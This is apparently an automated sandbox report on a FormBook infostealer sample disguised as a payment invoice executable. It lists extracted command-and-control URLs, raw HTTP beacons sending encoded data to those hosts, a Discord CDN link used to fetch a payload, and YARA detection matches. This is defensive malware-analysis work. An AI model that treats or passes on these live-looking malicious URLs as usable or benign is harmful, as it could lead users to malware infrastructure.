          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cmproutdoors.com/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cmproutdoors.com/c4mw/=M
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cmproutdoors.comwww.cmproutdoors.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/c4mw/
          Source: ipconfig.exe, 00000008.00000002.582221249.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/c4mw/?qF=hJ8nKRQ&Zq2=6BIvgwiNOe2S0DuRsljq4E4r8c4sx43MlqhhkJ7Wy2eBZ63a4DEc7ZSN
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.netwww.cutgang.net
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dylnov.ru
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dylnov.ru/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dylnov.ruwww.dylnov.ru
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.edgeonetest-14.top
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.edgeonetest-14.top/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.edgeonetest-14.topwww.edgeonetest-14.top
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fantastica.org.uk
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fantastica.org.uk/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fantastica.org.ukwww.fantastica.org.uk
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloudwww.genuineinsights.cloud
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.idszua.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.idszua.com/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.idszua.comwww.idszua.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.johnnsprague.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.johnnsprague.com/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.johnnsprague.comwww.johnnsprague.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.justicepeacefamily.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.justicepeacefamily.com/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.justicepeacefamily.comwww.justicepeacefamily.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.net
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.net/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.netwww.krankenzusatz.net
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.593471251.000000000D89A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lokoua.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.593471251.000000000D89A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lokoua.com/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lokoua.comwww.lokoua.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nonport.live
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nonport.live/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nonport.live/c4mw/7
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nonport.livewww.nonport.live
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.online
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.online/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.online/c4mw/H
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.onlinewww.toporsche.online
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.transformertabletable.com
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.transformertabletable.com/c4mw/
          Source: explorer.exe, 00000005.00000003.551183300.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.534109540.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.594040814.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.transformertabletable.comwww.transformertabletable.com
          Source: 2SD0--712.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
          Source: Payment INV NO. 230203-1USD.exe, 00000000.00000002.333839662.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Payment INV NO. 230203-1USD.exe, 00000006.00000002.379618522.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1072614287295660156/1076965214899146822/702
          Source: 2SD0--712.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 2SD0--712.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: ipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 2SD0--712.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: ipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: ipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: ipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: ipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: ipconfig.exe, 00000008.00000002.582221249.00000000031CC000.00000004.00000020.00020000.00000000.sdmp, 2SD0--712.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /c4mw/ HTTP/1.1Host: www.lokoua.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lokoua.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lokoua.com/c4mw/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5a 71 32 3d 69 4a 7a 6f 4b 6a 62 55 76 79 47 37 4f 6e 31 51 28 64 41 71 64 70 28 2d 63 31 61 37 63 41 71 4b 68 45 33 6a 73 78 63 45 33 61 44 6a 6f 57 50 50 48 37 41 65 32 71 56 6c 38 32 6a 44 79 68 79 69 31 53 59 70 71 42 7a 57 36 37 31 38 49 72 4e 69 51 43 79 63 30 35 54 54 34 66 31 64 6a 78 5a 33 34 63 55 4d 55 35 31 78 42 65 73 78 77 74 58 4c 49 58 69 70 71 61 50 7a 68 54 5a 33 5a 2d 4d 4e 55 6d 39 75 59 68 37 65 49 61 77 75 4b 64 42 42 6e 75 55 54 79 4f 34 5f 74 74 6a 4c 30 5f 68 33 5a 73 53 67 6a 59 78 61 47 41 76 43 61 4d 38 71 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Zq2=iJzoKjbUvyG7On1Q(dAqdp(-c1a7cAqKhE3jsxcE3aDjoWPPH7Ae2qVl82jDyhyi1SYpqBzW6718IrNiQCyc05TT4f1djxZ34cUMU51xBesxwtXLIXipqaPzhTZ3Z-MNUm9uYh7eIawuKdBBnuUTyO4_ttjL0_h3ZsSgjYxaGAvCaM8qgA).
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /attachments/1072614287295660156/1076965214899146822/702 HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /attachments/1072614287295660156/1076965214899146822/702 HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /c4mw/?Zq2=eUC8uwYyRxSeyYpSpO2Id78Q83vjRtDBPFOU2IN8r2HfZgJaOQlHD+kqnlWKRqcc2HVOfraHNMQASxEYc4wWxpLoACDs+5Tjdg==&qF=hJ8nKRQ HTTP/1.1Host: www.chernenko.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /c4mw/?Zq2=vLbIJTjaxi6VX2N+/Nw9CZTUcQ26TCmrvgrmgSoK7uvpnCbJI4wuwNhEzhrO+jOdriENsB2e9KNKFJNLYQWdyqDzg75x9Sdq9w==&qF=hJ8nKRQ HTTP/1.1Host: www.lokoua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49705 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.582093453.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.581974891.0000000002CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.396177857.0000000001230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.401587314.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.582148968.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Payment INV NO. 230203-1USD.exe
          Executable has a suspicious name (potential lure to open the executable)
          Source: Payment INV NO. 230203-1USD.exeStatic file information: Suspicious name
          Source: Payment INV NO. 230203-1USD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 7.2.Payment INV NO. 230203-1USD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.388331806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.333839662.00000000026C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, author = Florian Roth (Nextron Systems), description = Detects an base64 encoded executable with reversed characters, score = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, reference = Internal Research
